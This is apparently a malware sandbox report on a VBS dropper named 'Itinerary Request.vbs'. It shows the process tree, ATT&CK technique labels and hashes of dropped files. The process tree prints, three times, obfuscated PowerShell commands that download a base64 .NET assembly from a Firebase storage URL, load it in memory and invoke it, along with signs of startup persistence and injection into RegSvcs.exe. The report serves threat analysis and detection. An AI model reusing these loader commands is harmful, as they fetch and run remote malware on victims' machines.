  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bj▒GU▒dgBy▒Gc▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Bo▒GI▒bwB2▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒Hg▒YgBm▒GU▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒ZgBp▒HI▒ZQBi▒GE▒cwBl▒HM▒d▒Bv▒HI▒YQBn▒GU▒LgBn▒G8▒bwBn▒Gw▒ZQBh▒H▒▒aQBz▒C4▒YwBv▒G0▒LwB2▒D▒▒LwBi▒C8▒cgBv▒GQ▒cgBp▒GE▒awBk▒C0▒O▒▒0▒DE▒MwBk▒C4▒YQBw▒H▒▒cwBw▒G8▒d▒▒u▒GM▒bwBt▒C8▒bw▒v▒GQ▒b▒Bs▒CU▒MgBG▒GQ▒b▒Bs▒CU▒Mg▒w▒Eg▒bwBw▒GU▒LgB0▒Hg▒d▒▒/▒GE▒b▒B0▒D0▒bQBl▒GQ▒aQBh▒CY▒d▒Bv▒Gs▒ZQBu▒D0▒Ng▒x▒GM▒O▒▒y▒Dk▒Zg▒2▒C0▒ZQ▒x▒Dk▒Ng▒t▒DQ▒OQBl▒Dg▒LQBi▒DQ▒ZgBm▒C0▒M▒▒0▒DE▒MQ▒z▒DQ▒NQ▒3▒Dc▒ZgBm▒GU▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒e▒Bi▒GY▒ZQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒Zg▒w▒DE▒NwBk▒Dg▒Ng▒5▒Dk▒MQ▒x▒GQ▒LQ▒2▒D▒▒ZQ▒5▒C0▒N▒Bj▒Dk▒N▒▒t▒DM▒YgBm▒DU▒LQ▒2▒GU▒Nw▒4▒GI▒OQ▒0▒DE▒PQBu▒GU▒awBv▒HQ▒JgBh▒Gk▒Z▒Bl▒G0▒PQB0▒Gw▒YQ▒/▒HQ▒e▒B0▒C4▒awBu▒Gk▒b▒B5▒GQ▒Z▒B1▒GI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gg▒YgBv▒HY▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YwBl▒HY▒cgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Itinerary Request.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$cevrg = '034';$hbovx = 'C:\Users\Admin\Downloads\Itinerary Request.vbs';[Byte[]] $uxbfe = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uxbfe).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('f017d869911d-60e9-4c94-3bf5-6e78b941=nekot&aidem=tla?txt.knilyddub/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hbovx , '_______________________-------------', $cevrg, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4192
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\Downloads\Itinerary Request.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1816
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4552

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Itinerary Request.vbs"
1⤵
- Checks computer location settings
PID:2484
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bj▒GU▒dgBy▒Gc▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Bo▒GI▒bwB2▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒Hg▒YgBm▒GU▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒ZgBp▒HI▒ZQBi▒GE▒cwBl▒HM▒d▒Bv▒HI▒YQBn▒GU▒LgBn▒G8▒bwBn▒Gw▒ZQBh▒H▒▒aQBz▒C4▒YwBv▒G0▒LwB2▒D▒▒LwBi▒C8▒cgBv▒GQ▒cgBp▒GE▒awBk▒C0▒O▒▒0▒DE▒MwBk▒C4▒YQBw▒H▒▒cwBw▒G8▒d▒▒u▒GM▒bwBt▒C8▒bw▒v▒GQ▒b▒Bs▒CU▒MgBG▒GQ▒b▒Bs▒CU▒Mg▒w▒Eg▒bwBw▒GU▒LgB0▒Hg▒d▒▒/▒GE▒b▒B0▒D0▒bQBl▒GQ▒aQBh▒CY▒d▒Bv▒Gs▒ZQBu▒D0▒Ng▒x▒GM▒O▒▒y▒Dk▒Zg▒2▒C0▒ZQ▒x▒Dk▒Ng▒t▒DQ▒OQBl▒Dg▒LQBi▒DQ▒ZgBm▒C0▒M▒▒0▒DE▒MQ▒z▒DQ▒NQ▒3▒Dc▒ZgBm▒GU▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒e▒Bi▒GY▒ZQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒Zg▒w▒DE▒NwBk▒Dg▒Ng▒5▒Dk▒MQ▒x▒GQ▒LQ▒2▒D▒▒ZQ▒5▒C0▒N▒Bj▒Dk▒N▒▒t▒DM▒YgBm▒DU▒LQ▒2▒GU▒Nw▒4▒GI▒OQ▒0▒DE▒PQBu▒GU▒awBv▒HQ▒JgBh▒Gk▒Z▒Bl▒G0▒PQB0▒Gw▒YQ▒/▒HQ▒e▒B0▒C4▒awBu▒Gk▒b▒B5▒GQ▒Z▒B1▒GI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gg▒YgBv▒HY▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YwBl▒HY▒cgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Itinerary Request.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$cevrg = '034';$hbovx = 'C:\Users\Admin\Downloads\Itinerary Request.vbs';[Byte[]] $uxbfe = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uxbfe).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('f017d869911d-60e9-4c94-3bf5-6e78b941=nekot&aidem=tla?txt.knilyddub/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hbovx , '_______________________-------------', $cevrg, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:980
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\Downloads\Itinerary Request.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1936
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1700

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\Itinerary Request.vbs"
1⤵
- Checks computer location settings
PID:4240
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Bj▒GU▒dgBy▒Gc▒I▒▒9▒C▒▒Jw▒w▒DM▒N▒▒n▒Ds▒J▒Bo▒GI▒bwB2▒Hg▒I▒▒9▒C▒▒Jw▒l▒H▒▒egBB▒GM▒TwBn▒Ek▒bgBN▒HI▒JQ▒n▒Ds▒WwBC▒Hk▒d▒Bl▒Fs▒XQBd▒C▒▒J▒B1▒Hg▒YgBm▒GU▒I▒▒9▒C▒▒WwBz▒Hk▒cwB0▒GU▒bQ▒u▒EM▒bwBu▒HY▒ZQBy▒HQ▒XQ▒6▒Do▒RgBy▒G8▒bQBC▒GE▒cwBl▒DY▒N▒BT▒HQ▒cgBp▒G4▒Zw▒o▒C▒▒K▒BO▒GU▒dw▒t▒E8▒YgBq▒GU▒YwB0▒C▒▒TgBl▒HQ▒LgBX▒GU▒YgBD▒Gw▒aQBl▒G4▒d▒▒p▒C4▒R▒Bv▒Hc▒bgBs▒G8▒YQBk▒FM▒d▒By▒Gk▒bgBn▒Cg▒JwBo▒HQ▒d▒Bw▒HM▒Og▒v▒C8▒ZgBp▒HI▒ZQBi▒GE▒cwBl▒HM▒d▒Bv▒HI▒YQBn▒GU▒LgBn▒G8▒bwBn▒Gw▒ZQBh▒H▒▒aQBz▒C4▒YwBv▒G0▒LwB2▒D▒▒LwBi▒C8▒cgBv▒GQ▒cgBp▒GE▒awBk▒C0▒O▒▒0▒DE▒MwBk▒C4▒YQBw▒H▒▒cwBw▒G8▒d▒▒u▒GM▒bwBt▒C8▒bw▒v▒GQ▒b▒Bs▒CU▒MgBG▒GQ▒b▒Bs▒CU▒Mg▒w▒Eg▒bwBw▒GU▒LgB0▒Hg▒d▒▒/▒GE▒b▒B0▒D0▒bQBl▒GQ▒aQBh▒CY▒d▒Bv▒Gs▒ZQBu▒D0▒Ng▒x▒GM▒O▒▒y▒Dk▒Zg▒2▒C0▒ZQ▒x▒Dk▒Ng▒t▒DQ▒OQBl▒Dg▒LQBi▒DQ▒ZgBm▒C0▒M▒▒0▒DE▒MQ▒z▒DQ▒NQ▒3▒Dc▒ZgBm▒GU▒Jw▒p▒Ck▒OwBb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QQBw▒H▒▒R▒Bv▒G0▒YQBp▒G4▒XQ▒6▒Do▒QwB1▒HI▒cgBl▒G4▒d▒BE▒G8▒bQBh▒Gk▒bg▒u▒Ew▒bwBh▒GQ▒K▒▒k▒HU▒e▒Bi▒GY▒ZQ▒p▒C4▒RwBl▒HQ▒V▒B5▒H▒▒ZQ▒o▒Cc▒QwBs▒GE▒cwBz▒Ew▒aQBi▒HI▒YQBy▒Hk▒Mw▒u▒EM▒b▒Bh▒HM▒cw▒x▒Cc▒KQ▒u▒Ec▒ZQB0▒E0▒ZQB0▒Gg▒bwBk▒Cg▒JwBa▒Hg▒SwBI▒Ec▒Jw▒p▒C4▒SQBu▒HY▒bwBr▒GU▒K▒▒k▒G4▒dQBs▒Gw▒L▒▒g▒Fs▒bwBi▒Go▒ZQBj▒HQ▒WwBd▒F0▒I▒▒o▒Cc▒Zg▒w▒DE▒NwBk▒Dg▒Ng▒5▒Dk▒MQ▒x▒GQ▒LQ▒2▒D▒▒ZQ▒5▒C0▒N▒Bj▒Dk▒N▒▒t▒DM▒YgBm▒DU▒LQ▒2▒GU▒Nw▒4▒GI▒OQ▒0▒DE▒PQBu▒GU▒awBv▒HQ▒JgBh▒Gk▒Z▒Bl▒G0▒PQB0▒Gw▒YQ▒/▒HQ▒e▒B0▒C4▒awBu▒Gk▒b▒B5▒GQ▒Z▒B1▒GI▒LwBv▒C8▒bQBv▒GM▒LgB0▒G8▒c▒Bz▒H▒▒c▒Bh▒C4▒M▒▒4▒Dk▒Ng▒1▒C0▒ZQBw▒G8▒a▒▒v▒GI▒Lw▒w▒HY▒LwBt▒G8▒Yw▒u▒HM▒aQBw▒GE▒ZQBs▒Gc▒bwBv▒Gc▒LgBl▒Gc▒YQBy▒G8▒d▒Bz▒GU▒cwBh▒GI▒ZQBy▒Gk▒Zg▒v▒C8▒OgBz▒H▒▒d▒B0▒Gg▒Jw▒g▒Cw▒I▒▒k▒Gg▒YgBv▒HY▒e▒▒g▒Cw▒I▒▒n▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒Xw▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒Cc▒L▒▒g▒CQ▒YwBl▒HY▒cgBn▒Cw▒I▒▒n▒DE▒Jw▒s▒C▒▒JwBS▒G8▒Z▒Bh▒Cc▒I▒▒p▒Ck▒Ow▒=';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\Admin\Downloads\Itinerary Request.vbs');powershell -command $KByHL;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$cevrg = '034';$hbovx = 'C:\Users\Admin\Downloads\Itinerary Request.vbs';[Byte[]] $uxbfe = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($uxbfe).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('f017d869911d-60e9-4c94-3bf5-6e78b941=nekot&aidem=tla?txt.knilyddub/o/moc.topsppa.08965-epoh/b/0v/moc.sipaelgoog.egarotsesaberif//:sptth' , $hbovx , '_______________________-------------', $cevrg, '1', 'Roda' ));"
    3⤵
    - Blocklisted process makes network request
    - Drops startup file
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3696
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Copy-Item 'C:\Users\Admin\Downloads\Itinerary Request.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
      4⤵
      NTFS ADS
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2348
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:1308

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

Filesize
522B

MD5
8334a471a4b492ece225b471b8ad2fc8

SHA1
1cb24640f32d23e8f7800bd0511b7b9c3011d992

SHA256
5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

SHA512
56ae2e83355c331b00d782797f5664c2f373eac240e811aab978732503ae05eb20b08730d2427ed90efa5a706d71b42b57153596a45a6b5592e3dd9128b81c36

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0dc31145339977b457eec605c4e1a567

SHA1
deb6ff8183afdaafd849858c821af52f93936e1c

SHA256
4b1ef876e1d4f2c9726b7b966222c336d0be026c588178ad40ab476be4d353ec

SHA512
ef095404247530ade966bae7d6920f0ff060852e3dfb545f4bbca384f88d0e2a4622b55e4b856ab63f6e6c56196a8ad1257711b53a2fcdd89962d1252b6c4e17

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
31f5155eeaa8631c1c80614efb4e73cd

SHA1
aac054ba3a9bd71bb2644cc541aad11a5f119017

SHA256
7e0833f04bdc7ed7a88940d793f110d199368d7c2ca55eabb154de84a355d7cf

SHA512
94c43c4e59ae3745fee5157852c279110de2f89dd1562c47627ef960a70790db0b713155817ac7ac636e43f0218f73d35c915f9de61df019ba65c09730a21452

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
384B

MD5
571fd7bc4e5556394a35634d536c65b6

SHA1
5c0ee57fd17f18a85ac3270c5a1e96595bb66ca7

SHA256
08896e6029fdffdc75861600d809e15b717be386350b1e117f0785d694188e24

SHA512
ad0f2276aaa45a1dd7eb5acb97ec51769ffd5e179784eadad798ff8c815162945e19a307d4cd9b5f5b4850a4cb64be235e4a4dc963030f0ba9e0940b65bd355a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
3KB

MD5
7829865dd671238708c5d88545e402c7

SHA1
4f81d4b0ae0e0b4d9ec8a061aabc60be7fe0e2ea

SHA256
b21d4e88ffdd5cd51828567bf38eb2d1cd11f3501db8e0e9ba6da228b1db44b4

SHA512
7ea5434900a5b6ac534ea3ff243005f18cf1d949fe12daea457bd5c163f6979b4c1820d6590f3f8944e2b149ee1a9040c1fe3642ddd1b7ae93eb4f07d8350bb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
9957beaca661da723343b636d8025145

SHA1
5e6036b02085f58244bb4a366d003d98f233074e

SHA256
516264f4c48c59099e8d73f7b10c2a8f67397ae4ec2be46367af6942d85e7c4e

SHA512
28e62ac96d37250bf7223da849ee387d0e01297749ea048541830dfeedea9a8494a45e6d2ac74a21a49d49f27ba244b574a54b46202c6636065a8d2e9e7976c8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
7KB

MD5
1f5483521e2516b51bda2ad33b3ee7cb

SHA1
69022d6d0470d0b9741874133a07075309d4d977

SHA256
87b711c8a47f576204f3f5e84140cc98df52c22d7ec69a1ea6ef94c033327302

SHA512
359545da47f46730f531ebdbbe79dfa6ae4bcedcdbed8b970a0fff0c02139fedb3d173303f767cd560ecf3e6a9c22f4cb3d98c3e82ebe678fddb77fc9eff0f58

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
f12ec3d76a639d50cd013377ba07b988

SHA1
dc30ef69fc67001f9626268a3f77833df7c0ea43

SHA256
1929e897948767b04aeac944c1afb49144cb8d7c6df87e401eae10501b3d4b50

SHA512
2ce4f66c35cce0878bb7fc5841eed78ae51fb176fd6654fc0805f393a47e58f6821bfa43ad4f87bc4a62cc9a01a9b407fca85009d6b4699ac6c79ebaddfbd9a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
a947ee7a0502211a2f9af90282ea785e

SHA1
48ba8c32c4a9b14044d21c73cb3fcf7cba0ddfbf

SHA256
785de779fe779aa9f128818de1a96f76c33591360d7f5f26677e6b2c23910186

SHA512
c097592d6ddb353e1b976889a1e53e4de22cb34ca404897da5279067d9fa91e57bbc43f73eca6e14e82ed16900d96ac42da362e4353cb639386a8aaffefeaba0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
4ac1f87215f3ee3c73e50464fa694aed

SHA1
1a91c28beca47ec26b24c1571d0a07302854ac6c

SHA256
5987635bb4c98dffc7a2d31b4cfd78371cb5cc5e526b39f42a46b090563cf228

SHA512
274e94ca859f717852b660b037f4c41cca4a77ca4dcdd0a0f723caa9e9aa7ef37c29210e8b9a8115bb4b26080f86453b2a6186a230201af0a24716b2cbdb83f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9bc7f1b87a2c2bc9983a37920272f493

SHA1
1f4c28f4ddd202012474c28d857cae8f8f555ddf

SHA256
13c488a6e5d81afee96b146445e7c2b153995b546bba9c6cbc4f5244eae843b1

SHA512
9c0869d87ff9f71da92b73bbdcda5328a2633de6b8d32ed253f8fea52768bdacb6bebad49ec97006494da8cc5e9008453e5901de28e30d4b560e734d98f0f3c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
235a8eb126d835efb2e253459ab8b089

SHA1
293fbf68e6726a5a230c3a42624c01899e35a89f

SHA256
5ffd4a816ae5d1c1a8bdc51d2872b7dd99e9c383c88001d303a6f64a77773686

SHA512
a83d17203b581491e47d65131e1efc8060ff04d1852e3415fc0a341c6a9691ef9f4cf4dd29d2f6d0032a49f2ba4bd36c35b3f472f0ce5f78f4bb139124760e92

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b8dc7faa83176428daffaf42d97a729f

SHA1
b1bcd193d9b7663a7e1f62ad3d87cad82ff24881

SHA256
6852ff8779c2df850fcc33c3e1004e204d072b1dce607660b9100f2be2c1d33e

SHA512
be43b7f8c2db75bddcf5415e0bc19eeb0a519085f8c2418241b24e8645a3caae7815897a8ea97f9167988b9a1672d90173b26fcb759a0f0f48c5cf6b165bd9a6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
